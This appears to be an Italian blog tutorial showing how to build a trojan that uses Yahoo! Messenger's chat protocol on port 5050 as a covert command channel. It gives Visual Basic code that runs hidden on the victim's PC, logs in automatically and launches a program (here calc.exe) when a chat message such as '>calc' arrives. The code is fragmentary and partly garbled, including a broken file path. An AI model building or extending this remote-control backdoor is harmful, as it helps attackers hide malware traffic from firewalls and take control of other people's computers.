Yahoo! Messenger come un Trojan!



Partiamo da una premessa: un client si comporta in maniera identica ad un trojan: soltanto gli scopi sono differenti. Spesso i trojan sono facilmente riconoscibili dagli antivirus e dai firewall in quanto utilizzano porte particolari che sono costantemente tenute sotto controllo.

Dunque, quando Yahoo! Messenger è in esecuzione, il software dialoga con il server mediante la porta 5050. Questa porta, dunque, rimane libera e non può essere bloccata, altrimenti sarà impossibile chattare. Scrivendo un programma che utilizza uno dei protocolli di Yahoo! quali YMSG, YCHT o CHAT2 e connettendo un account Yahoo! ad un suo server, quale ad esempio dcs.chat.dcn.yahoo.com, è possibile far funzionare Yahoo! Messenger come una console in grado di pilotare il programma a nostro piacimento. Tale procedura richiede però un’ottima conoscenza dei protocolli e di programmazione, soprattutto riguardo alla funzione di login e di MP.

Un esempio:
Scriviamo un programmino che lancia, al comando, l’applicazione calc.exe (la calcolatrice di Windows) nel PC della vittima. Da Yahoo! Messenger si invia un messaggio contenente la stringa “>calc”, all’ID che abbiamo inserito:

Private Sub Form_Load()
Id = "UserYahooID"
Pass = "Password"

Winsock1.Close
Winsock2.Close
Winsock1.Connect "edit.yahoo.com", "80"
End Sub

L’applicazione viene lanciata dal pc della vittima e, appena il messaggio giunge a destinazione, l’ID va in login in automatico e viene lanciata la calcolatrice di Windows:

Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long)

Dim pacchetto As String
winsock2.GetData pacchetto
If InStr(pacchetto, ">calc") > 0 Then
X = ShellExecute(hWnd, "Open", "c:windowssystem32calc.exe", vbNullString, vbNullString, SW_NORMAL)
End If
Call SpezzaPacchetto(pacchetto, winsock2)
End Sub

La form puà facilmente essere nascosta con il seguente codice:

Form1.visible=False

Come possiamo notare, l’esperimento è perfettamente riuscito.

Annunci sponsorizzati:
Condividi su Facebook Condividi su Twitter!
Pinterest